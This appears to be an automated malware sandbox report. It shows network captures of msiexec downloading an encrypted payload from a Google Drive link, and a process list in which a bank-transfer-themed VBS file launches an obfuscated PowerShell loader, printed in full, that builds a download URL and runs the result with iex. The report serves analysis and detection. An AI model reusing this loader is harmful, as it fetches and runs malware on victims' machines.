NRErvF/gSjxMfCLvwUZIPhcjTSdpPG71dqRUbkmXloKRB8mAB3w9ePKDy+5/Q0Owuo0gGCU5KhIMwBoQNFd8JHoUKgYVQx2Su/Yw0rFBFuI/orFmZfFOmVdBEO3OV+tkWeezjdx9unBtzjyu/TdldXv4M+0n1Fe8Q/B0zS/SiPXluChdLw8QP3h7JqsCMoYOvDf/kjtjDE4hoBc40tynDOPQA4dIp2vityV3ADQWCJPCkinKSH/Ys/Cb85JJrXZ
2024-10-01 13:52:11 UTC	1390	IN	Data Raw: 6f 38 37 6b 63 49 51 67 45 47 53 44 35 56 4a 77 30 49 4a 62 79 70 44 65 51 31 4b 6e 54 51 79 42 4d 79 69 33 67 74 4f 5a 78 4b 46 49 63 2b 6a 56 79 65 6a 71 68 6c 6e 70 32 52 77 6c 5a 76 4f 63 49 79 61 68 32 62 39 4e 6d 79 6a 67 58 4a 71 6e 5a 4b 4f 52 70 44 30 4c 74 36 63 2b 78 73 44 54 77 53 4f 32 6b 2b 59 63 67 42 6c 45 2b 57 67 6e 41 35 56 61 46 38 55 4e 61 68 4c 4e 6d 56 59 57 70 47 46 56 49 6d 2f 32 2b 51 53 35 63 57 53 48 4c 77 44 6c 75 76 6e 6f 33 6e 70 46 48 67 4b 67 77 30 58 54 5a 72 41 55 38 4f 62 4c 61 58 59 57 6d 33 32 4d 73 71 52 68 56 68 61 6e 52 37 56 57 2f 44 42 37 56 59 31 47 45 79 55 57 6e 64 38 59 61 46 31 57 56 44 68 68 56 68 61 6b 59 74 6d 2f 67 42 51 43 36 4b 79 76 34 37 51 74 35 54 4d 69 7a 43 64 77 72 47 59 58 52 59 49 68 2f 66 39 Data Ascii: o87kcIQgEGSD5VJw0IJbypDeQ1KnTQyBMyi3gtOZxKFIc+jVyejqhlnp2RwlZvOcIyah2b9NmyjgXJqnZKORpD0Lt6c+xsDTwSO2k+YcgBlE+WgnA5VaF8UNahLNmVYWpGFVIm/2+QS5cWSHLwDluvno3npFHgKgw0XTZrAU8ObLaXYWm32MsqRhVhanR7VW/DB7VY1GEyUWnd8YaF1WVDhhVhakYtm/gBQC6Kyv47Qt5TMizCdwrGYXRYIh/f9
2024-10-01 13:52:11 UTC	1390	IN	Data Raw: 6c 79 69 66 63 6c 34 4d 73 42 6f 6b 72 6d 66 66 6d 6e 73 34 6b 67 6a 55 6c 30 59 31 79 4b 4e 33 34 53 70 47 41 59 2b 48 6f 78 37 6a 43 6a 72 37 39 42 73 53 39 52 47 54 55 52 78 63 53 6a 62 57 6d 5a 47 71 41 51 5a 49 50 6c 63 6e 44 52 2b 62 45 66 56 4f 51 50 32 35 74 38 36 32 52 33 35 70 44 69 34 50 75 6b 72 74 45 4d 59 2b 48 77 35 30 77 6a 67 4a 48 65 4c 36 63 72 4e 77 70 4f 57 71 32 6f 6d 58 71 6f 43 6f 4e 45 44 51 36 78 31 6f 39 32 32 66 6d 78 47 38 4a 6d 75 64 39 73 48 64 74 37 42 45 6b 55 56 7a 45 76 75 44 48 4c 33 34 41 52 61 52 57 54 46 4e 35 6d 57 6d 38 42 49 67 51 79 53 57 50 78 50 4e 73 46 34 73 55 68 61 7a 43 62 4a 31 71 33 4f 54 34 71 30 56 6a 35 73 76 45 54 67 52 43 5a 31 51 55 45 69 76 42 52 68 6d 43 41 61 56 63 36 57 67 53 54 54 52 75 55 62 Data Ascii: lyifcl4MsBokrmffmns4kgjUl0Y1yKN34SpGAY+Hox7jCjr79BsS9RGTURxcSjbWmZGqAQZIPlcnDR+bEfVOQP25t862R35pDi4PukrtEMY+Hw50wjgJHeL6crNwpOWq2omXqoCoNEDQ6x1o922fmxG8Jmud9sHdt7BEkUVzEvuDHL34ARaRWTFN5mWm8BIgQySWPxPNsF4sUhazCbJ1q3OT4q0Vj5svETgRCZ1QUEivBRhmCAaVc6WgSTTRuUb
2024-10-01 13:52:11 UTC	1390	IN	Data Raw: 41 33 50 44 4e 54 75 75 45 69 68 45 33 42 46 2b 4e 38 54 2b 61 6d 61 4e 72 6b 65 48 67 42 45 64 69 36 38 39 4e 53 4d 6b 4d 53 52 46 6c 47 4a 44 58 4a 59 62 4e 51 56 4f 57 4f 34 67 68 52 4c 78 6e 41 6a 4b 65 4b 66 59 41 59 6b 44 51 52 50 65 52 76 67 5a 71 66 4e 77 49 50 78 6c 56 68 66 71 6a 47 72 46 4e 6d 64 52 32 4b 76 62 30 66 43 6a 7a 36 4c 75 72 65 39 52 75 68 62 72 35 6b 43 6a 62 31 37 7a 41 47 4e 79 47 6b 58 32 6d 6a 55 35 6a 63 6e 2f 35 5a 32 71 6d 69 57 2b 76 52 6d 5a 46 47 73 53 38 6c 7a 62 4c 6c 2b 49 47 41 74 75 31 57 64 59 51 6c 38 56 48 52 70 79 75 74 66 4b 52 6a 4e 51 69 6c 63 4f 45 71 52 67 47 50 6c 5a 79 6d 69 51 6f 38 77 54 7a 32 4f 6e 55 52 76 7a 6a 37 70 73 6f 36 31 5a 30 73 4e 63 48 47 53 44 36 56 4a 38 30 6e 49 7a 39 71 2f 59 70 56 4b Data Ascii: A3PDNTuuEihE3BF+N8T+amaNrkeHgBEdi689NSMkMSRFlGJDXJYbNQVOWO4ghRLxnAjKeKfYAYkDQRPeRvgZqfNwIPxlVhfqjGrFNmdR2Kvb0fCjz6Lure9Ruhbr5kCjb17zAGNyGkX2mjU5jcn/5Z2qmiW+vRmZFGsS8lzbLl+IGAtu1WdYQl8VHRpyutfKRjNQilcOEqRgGPlZymiQo8wTz2OnURvzj7pso61Z0sNcHGSD6VJ80nIz9q/YpVK
2024-10-01 13:52:11 UTC	1390	IN	Data Raw: 46 35 54 39 33 53 66 6d 62 70 6c 75 6d 63 43 42 46 34 33 42 6f 42 4f 6b 55 4a 76 58 42 57 49 37 59 33 46 6c 67 6c 74 6a 66 7a 75 73 4a 45 34 74 50 61 5a 76 34 77 35 4c 74 47 4b 71 51 2f 69 68 61 6b 59 56 59 56 58 38 6a 67 62 66 6c 4e 68 63 53 75 32 2f 55 7a 55 72 51 6e 47 78 55 64 6a 38 7a 39 4f 67 52 44 69 51 57 2b 63 42 61 68 6a 5a 4f 65 5a 68 64 31 4a 49 59 59 4f 50 41 39 58 68 61 6b 58 30 4e 6d 38 47 46 56 4a 46 66 61 38 51 44 38 55 6c 65 4e 62 41 6d 79 58 4c 35 4a 59 53 6a 39 37 32 46 6b 78 54 69 62 63 78 68 54 57 67 58 59 58 75 35 63 52 46 35 4b 33 6c 68 68 56 68 61 6b 59 74 61 4d 48 56 75 61 41 48 6c 67 72 37 6b 77 50 75 2f 43 39 50 48 72 75 64 65 43 72 37 34 32 79 66 51 36 66 58 6b 6a 54 72 33 46 63 61 4f 61 65 52 42 32 49 6b 65 41 6a 71 42 68 56 Data Ascii: F5T93SfmbplumcCBF43BoBOkUJvXBWI7Y3FlgltjfzusJE4tPaZv4w5LtGKqQ/ihakYVYVX8jgbflNhcSu2/UzUrQnGxUdj8z9OgRDiQW+cBahjZOeZhd1JIYYOPA9XhakX0Nm8GFVJFfa8QD8UleNbAmyXL5JYSj972FkxTibcxhTWgXYXu5cRF5K3lhhVhakYtaMHVuaAHlgr7kwPu/C9PHrudeCr742yfQ6fXkjTr3FcaOaeRB2IkeAjqBhV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49715	216.58.206.78	443	5792	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 13:52:47 UTC	216	OUT	GET /uc?export=download&id=1N1jCXJK7gaZnsqU2On4d-9WUveSwJsw1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
2024-10-01 13:52:47 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 01 Oct 2024 13:52:47 GMT Location: https://drive.usercontent.google.com/download?id=1N1jCXJK7gaZnsqU2On4d-9WUveSwJsw1&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-sfiY4LbemA097rcYZEwxzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49716	142.250.184.193	443	5792	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 13:52:48 UTC	258	OUT	GET /download?id=1N1jCXJK7gaZnsqU2On4d-9WUveSwJsw1&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-10-01 13:52:51 UTC	4857	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="TjWfdGMBtigIrsxjzb163.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 240192 Last-Modified: Tue, 01 Oct 2024 12:59:39 GMT X-GUploader-UploadID: AD-8ljugza_VG1iLPcdhknT_NaLowRQdlQ-Gbi7iCegZzSvP3LLFY_0rCQVxhPwkqH9XwdaNVQ Date: Tue, 01 Oct 2024 13:52:51 GMT Expires: Tue, 01 Oct 2024 13:52:51 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=8FlklA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-01 13:52:51 UTC	4857	IN	Data Raw: 07 20 c9 7c ba 26 27 9c 7b 34 5e 39 85 9e 38 34 cf 5b 0c 93 2d a2 f5 87 fe e7 2a 81 ba 52 6b 34 be 5c 00 5f 01 cf 3f d9 9a 07 c4 4d ab 55 ed 1d 3a eb c8 2b 1b ed 29 4f 1e 0c d6 e6 5e be 28 77 bc d9 1b 94 a8 81 d5 81 d5 a2 50 6c d6 90 a8 ed c8 96 07 8d b2 e3 d3 5c a6 18 fc 9e a0 b4 d3 1c 51 8f c6 70 49 64 56 b0 d8 63 44 f2 53 7f c4 a4 c8 e7 f6 c5 ac 5d 22 08 a1 a5 47 44 4f 26 60 69 48 9c 67 d6 15 29 22 d4 3a b3 20 08 fb 9b df 9c c1 1d 15 1e b8 ad 1a 12 ee 17 23 6e b6 92 74 c2 ce 42 17 10 c8 31 6e 94 89 a6 04 26 ad a1 62 91 9e a1 6e e0 ab a0 1e 5c 21 c3 93 8c f4 94 ed 31 ce 45 53 9c 16 75 1e 47 26 25 7c 47 d3 b3 ac a1 7a 71 0a 6e b3 6b 2b e5 73 37 39 91 9d f3 ba 5e d3 b0 f5 dd d7 5a fe 72 96 59 76 ec 76 c3 54 80 3d f6 85 f9 7a ad 4a be c0 80 48 45 cd 3b 12 Data Ascii: \|&'{4^984[-*Rk4\_?MU:+)O^(wPl\QpIdVcDS]"GDO&`iHg)": #ntB1n&bn\!1ESuG&%\|Gzqnk+s79^ZrYvvT=zJHE;
2024-10-01 13:52:51 UTC	4857	IN	Data Raw: 15 41 78 76 9d 50 46 df 21 38 0c 39 50 2e 65 c6 1e 7e 5f d3 ae db 5c 35 4d 5d 68 76 26 dd 4c 4d 82 95 3e 3c c5 cd 3e 83 e1 98 a5 ed 56 3e ff df 9f 40 77 45 95 7e 46 9f 88 97 31 df e5 eb a2 19 68 74 ce 46 05 39 c5 f3 1b 3d 5e 86 cc 45 1c 79 eb f0 07 3c 15 21 f7 a4 ec 4d da 4b 94 db 9e a3 f7 ec bc 1f 41 fb da 22 cd e7 02 8b da 29 14 2d fc ae 18 3a 75 e2 0e 4d 6a 6c 8f 55 c8 92 56 f6 9e 92 ed a7 a8 88 a4 cc d5 9f 92 94 65 ac 3e 0e 29 e9 98 b5 f8 f5 90 bd a3 21 e1 d0 98 66 9f 5a 89 b7 40 b2 76 c2 f1 0a 5d 49 d8 68 8c 8e 15 1a 9f 69 9c ab ab 53 25 c4 f7 ef cc e7 29 0b 5b 2b 41 9c 70 44 d4 7d 01 c2 e7 4b 18 99 6d b7 a8 a1 80 8b c8 93 5b c6 81 00 6e 73 64 c3 2f c9 c9 74 a1 4d 93 8a 09 1f 98 eb a8 b1 dc 19 0d 85 28 9f d8 71 a3 53 2a 44 ee f9 4a 4a 3f d1 ea 4b 47 Data Ascii: AxvPF!89P.e~_\5M]hv&LM><>V>@wE~F1htF9=^Ey<!MKA")-:uMjlUVe>)!fZ@v]IhiS%)[+ApD}Km[nsd/tM(qS*DJJ?KG
2024-10-01 13:52:51 UTC	130	IN	Data Raw: 6e b4 50 fc 62 4a cb 0d 9c 79 15 9e 84 7d 94 0e 02 92 6f 37 5c 83 ac 46 d4 6b c5 57 4a df 70 90 09 0a 81 b6 28 a8 94 9c e1 1d 94 7a ba 2a bd 85 c4 ea aa ef f3 65 1e c0 91 1e 78 d8 03 96 2f e9 e3 0b 7d 13 b6 06 05 a2 0f 9d bd 0d c5 b1 d6 93 fc be f0 da 98 e5 2a ec 9f ac 56 9b bf 45 ed 74 78 b0 4c 38 66 c6 77 33 b9 db 98 7f 0e e4 ab bc 45 90 ec c1 31 f5 e3 2c bd d8 49 9e b2 2f 73 87 95 96 Data Ascii: nPbJy}o7\FkWJp(zex/}VEtxL8fw3E1,I/s
2024-10-01 13:52:51 UTC	1319	IN	Data Raw: 81 a3 c2 61 70 62 45 75 e4 5f 88 fd 19 ed 9f 5b 05 71 c0 16 01 fd 50 f5 38 12 b3 5a 6c 9b 5d fb 9a 9a 1f e8 7f bc 47 4c 21 df c1 09 c1 67 b1 77 03 36 58 60 86 af e3 0a dd 05 4e 18 6c 72 3c 5b 98 3c 4a f9 a2 56 34 b1 4f 71 6d ca 69 18 59 1b 8c 2a 11 52 65 c8 08 5b fc 15 41 86 78 b1 51 46 21 2d ca 02 19 55 2e 9b ca e0 7f 46 cf ae db 5c 35 40 67 6d 5e 64 dd 74 42 7c 9b 34 04 70 35 c1 7c cb 66 ab f2 66 38 01 80 92 40 57 46 95 7e 57 41 89 ae 11 df 1b e5 58 10 50 4b 1f 4b 05 39 39 d7 27 3d 7e 88 e4 7c 1c 87 e0 37 2f 3d 15 01 87 a5 ec 4d 54 6d 92 db 9e 5b d3 e8 bc 3f 51 05 d6 22 33 c6 3a ab da 29 3c d4 f2 aa 1e ca 38 e2 0e 4c bc 5a 8b 55 c2 44 63 f2 9e b8 10 a9 a8 88 7a da ec 8e 92 6a 6b 5e 32 0f d7 1b 9a b5 d8 da 94 bd a3 df 1e e7 92 66 9f a4 bd 23 41 92 74 e2 Data Ascii: apbEu_[qP8Zl]GL!gw6X`Nlr<[<JV4OqmiY*Re[AxQF!-U.F\5@gm^dtB\|4p5\|ff8@WF~WAXPKK99'=~\|7/=MTm[?Q"3:)<8LZUDczjk^2f#At
2024-10-01 13:52:51 UTC	1390	IN	Data Raw: 58 40 79 a3 ef 0a 03 1f 4d 18 6c 72 31 61 83 1c 4c f9 5c 5a ce b0 5e 4f 6d ca 63 ac 19 1b 8c 2b d7 aa 9b 37 d7 64 fc 15 41 6b 46 be 51 5f de 21 c6 0a 39 50 3f bb ca 1e 7e 7f 27 a0 d8 5c f3 49 65 6d 76 26 23 78 4b 82 b5 3a 04 50 33 3f 7d f2 bb a5 fe 66 c6 f6 8c 9e 3c 14 47 95 7a a9 b3 8a 97 cf d3 1a e5 8e 1b 50 4b e4 b8 0b 39 3b df 1a 3d 7e 82 32 4b 1f 87 ea 37 2d 3f 15 01 84 a5 ec 4d 54 62 a7 cd 9e a5 df 1a b5 1f 47 7e b5 22 cd c3 fd 85 da 29 1c 28 fe ae 1e e4 7e e1 0e 4d 6a 6e 88 55 e8 69 5a f2 9e 4c ef 9e be 88 5a cd 12 82 92 94 9b 5e 33 0f 69 0d 96 b5 f8 f5 92 bd a3 21 e1 d0 9f 66 9f 5a 89 b0 40 b2 76 c2 f1 0a 5d 49 d8 f8 8c 8e 15 1a 9f 68 9c 26 a3 50 25 e2 0a e1 ce e7 29 09 5a 2b 33 65 7c 47 a4 20 33 c3 e7 4f 18 94 56 a8 80 a9 80 75 c2 e0 40 38 88 71 Data Ascii: X@yMlr1aL\Z^Omc+7dAkFQ_!9P?~'\Iemv&#xK:P3?}f<GzPK9;=~2K7-?MTbG~")(~MjnUiZLZ^3i!fZ@v]Ih&P%)Z+3e\|G 3OVu@8q
2024-10-01 13:52:51 UTC	1390	IN	Data Raw: 2f 3c 15 21 bd c3 ec 4d aa 43 97 db 9e a5 21 ea bf 1f 47 fb da 21 cd e7 01 8b da 29 c2 2b c7 b8 1e 1a 70 1c 04 4f 94 4a c4 55 c8 66 a4 fc 9c b2 ce a4 a8 88 5a 33 e2 8d 92 94 9b 5e 31 0f 09 17 96 b5 f8 2b 95 84 a9 21 1f de 9c 46 9e a4 85 b3 be 9c 77 c2 f1 f4 af 4b e1 c9 80 8e 15 e4 6d 69 a5 dd ad 51 25 fa 0c e1 ce e7 ef d9 a4 d4 cc e5 3c 44 a4 0a ce ca e6 4f 18 9c 6d b7 7e a0 83 8b e6 d2 40 c6 87 5a 46 7c 54 c6 25 27 c6 77 a1 b8 9e 89 18 4d 87 eb a8 c1 0a 02 0e 85 1a 9e 9f 71 a3 23 fc 5e ed f9 60 36 10 d0 ea b1 b8 06 c3 76 cb 4f 2b f7 93 88 c3 33 1d 67 06 6e 99 bc f0 19 5a 72 0c 9d e8 e6 6c 8b b8 d1 81 8b 94 ab 7f d4 b8 df a2 50 6c 11 d5 a8 ed 70 b6 04 8d b2 e3 2d 52 e5 18 fc 60 ac b7 d3 3c 51 8f c6 70 b7 65 6f ba d8 63 44 f2 73 7e c4 a4 c8 19 f8 c6 ac 5d Data Ascii: /<!MC!G!)+pOJUfZ3^1+!FwKmiQ%<DOm~@ZF\|T%'wMq#^`6vO+3gnZrlPlp-R`<QpeocDs~]
2024-10-01 13:52:51 UTC	1390	IN	Data Raw: 87 6f b7 80 89 80 8b ce e1 be c8 81 70 66 64 64 c3 25 c9 c9 75 a1 b3 60 85 0b 6d a7 ea a8 c1 f4 f2 0c bc 3e ed 9f 71 5d 2a 02 52 95 8d 40 37 14 f8 b6 4f b9 35 eb fc cb 4f 0b d7 91 88 c3 cd ed 69 04 4e 9b 42 fc 1b a4 5c 0f 9d e8 18 9e 89 81 fb 83 8b 94 ab a1 d4 81 d1 a2 ae 62 2b 6f a8 13 7c 94 07 ad b1 e3 d3 5c 18 19 c5 9b a0 b4 d3 24 54 8f c6 70 71 1e a9 4f 27 9d 4d f2 53 04 b1 a4 c8 e3 d3 3b a2 5c 22 f6 ac a5 47 6c 92 26 60 63 b8 8a dd d8 6e e9 2b 19 1f 23 27 44 36 bc 75 fd a8 6e 47 55 c8 c2 0d 1d fb 7a 03 09 0a ef 1a ad ba 9c 79 75 e8 7a 12 fa a9 cf 94 0a e8 ee 19 ef f3 ce 00 59 af ac 03 56 05 c1 93 18 f4 ac 21 31 8d 00 53 9c 5a 67 2d 44 a1 18 25 21 d3 be ac a1 6b 51 0a 6e 53 6b d7 ea 7a 36 0a d3 9c 53 b9 5e 2d b4 f7 dd f7 58 fe 72 48 19 74 d5 57 e3 54 Data Ascii: opfdd%u`m>q]*R@7O5OiNB\b+o\|\$TpqO'MS;\"Gl&`cn+#'D6unGUzyuzYV!1SZg-D%!kQnSkz6S^-XrHtWT
2024-10-01 13:52:51 UTC	1390	IN	Data Raw: 9d 45 cb 44 7f c4 a4 36 ee f7 c5 8c 7a 22 08 a1 e5 52 43 cf 26 40 4b 46 83 dd 26 1b 9d 2b 19 e5 07 21 44 16 8d 8b f4 a8 90 34 57 e8 c2 7d 60 71 73 03 0d f2 87 6e ad ba 66 07 6b ec 43 6b d2 b2 cf 6a 0c 94 9a 31 b1 f7 ee 32 85 85 ad ed 58 05 c3 93 72 f8 94 ed 11 8d 00 53 9c a4 75 24 65 a1 4f 24 df da b3 ac 84 01 05 0a 6e 57 19 19 e0 78 46 1a 8a 9d 53 b3 23 a7 b8 f5 d9 f7 4e fe 72 48 19 7b ec 76 e3 aa 8c 3d 36 a6 e0 7a ad 0a 40 c1 99 6a 45 cd 39 ec fe cb b6 7a 01 32 16 6c c8 f4 fe 0b ad 0b 41 ad e9 7b 05 41 7e be 7f 9a 19 87 52 bc 5a 9c 22 5f a6 95 5d fb 42 3e db fb f7 e0 de b4 55 9d 1c 1f f0 a5 30 ff b6 66 da 57 5f fd fe 94 3d ef 23 3b d3 81 8c 60 ae a0 6a 0e 1a 19 77 d0 77 56 4e 49 af ac 02 d7 a3 09 33 79 8d 84 3c 3a 86 92 ac ae af 49 8e 33 ba 4c 29 39 52 Data Ascii: ED6z"RC&@KF&+!D4W}`qsnfkCkj12XrSu$eO$nWxFS#NrH{v=6z@jE9z2lA{A~RZ"_]B>U0fW_=#;`jwwVNI3y<:I3L)9R
2024-10-01 13:52:51 UTC	1390	IN	Data Raw: f1 dd a7 72 e5 72 48 ed 08 98 76 e3 50 a0 1d 36 86 f9 84 a3 0a be c0 5e 44 45 cd 19 1f f7 cb b6 a1 7b 7f 34 6c cc 86 3c 06 ad 7b 4c cd 9d 7b 0f 38 78 02 7b 9e 49 b5 49 bc 5a 68 51 2b a6 95 a7 d7 4c 3e fb a5 09 ee de 4a 54 5a 32 1f f0 85 9d f6 b6 66 01 2d 12 f7 fe 90 4f 89 07 6f a3 a9 97 9e a0 aa 17 7a e4 15 73 f0 08 40 4e 49 51 5c 03 ee 81 f7 3f 79 73 ad 0d 3a a3 e9 26 af 96 6f fc fb be b2 50 11 49 d4 4f 66 68 bb b1 d3 5a b1 21 d6 07 9e 6e 57 b9 4b 18 d3 dc 1e cf 7b 74 85 98 89 eb c3 67 b6 5b cd cf 61 1b 40 39 f6 7f c6 1d 03 4b 42 f2 55 42 6d ac 8e bf c9 e2 87 94 12 10 57 af e3 35 a6 5d a4 c2 03 01 6a 9d a0 01 58 87 55 f3 75 0d be d7 3b 1b a9 65 cb 6f 5d 89 4b 52 fb ab 8e e3 d7 85 98 d7 da bd 7a c6 eb 1d 9c aa 8b 59 51 8c 01 84 75 1f 55 be cb dc 5d 1b 5d Data Ascii: rrHvP6^DE{4l<{L{8x{IIZhQ+L>JTZ2f-Oozs@NIQ\?ys:&oPIOfhZ!nWK{tg[a@9KBUBmW5]jXUu;eo]KRzYQuU]]
2024-10-01 13:52:51 UTC	1390	IN	Data Raw: 86 92 ac a1 96 6b 8e cd b6 b2 20 19 0b d4 4f 6c eb ce 88 d9 5e 91 36 fc 27 c4 90 59 b9 b5 16 2d d0 1e 31 57 11 85 b8 95 15 c2 5e 6a 5a f4 ed 9f 12 40 c7 da 04 b2 38 78 3b 30 2c 55 30 03 81 95 cf e1 f3 fa e0 18 6d 27 8f 85 31 86 40 5a cc 03 ff 64 63 ac 01 a6 ab 0a f3 55 07 40 d6 02 ef a8 5c e9 45 7d e9 b5 5b fb 55 a5 98 a3 85 66 df a8 8f 5f ff 9b 35 87 54 8a 6a 3b f8 01 84 8f 36 5f be eb d1 a3 15 5d 55 05 94 fc 1c eb 85 92 ed 07 18 28 06 7d ca ea 81 ea dd f6 20 63 fd cd 05 26 a8 f4 1f 3e 9b 7a b3 05 eb ea d3 a0 6f ac 34 d0 c0 9d 8c 24 0e 48 c1 7f c4 43 53 58 38 5a 76 c5 00 2b 17 b9 a7 d4 9f cc 74 60 29 31 5e a4 3b 6a dc 93 c6 e4 09 04 a9 65 af 22 4d f9 04 0f 76 32 ba eb 33 5d 80 3b f8 86 3f fc 5b b4 d4 5a c9 06 f5 9a 7c a8 79 9c 66 85 eb ba 9f e2 65 b8 2a Data Ascii: k Ol^6'Y-1W^jZ@8x;0,U0m'1@ZdcU@\E}[Uf_5Tj;6_]U(} c&>zo4$HCSX8Zv+t`)1^;je"Mv23];?[Z\|yfe*

Target ID:	0
Start time:	09:51:57
Start date:	01/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\r20240913TRANSFERENCIA.vbs"
Imagebase:	0x7ff6ed120000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:51:57
Start date:	01/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= 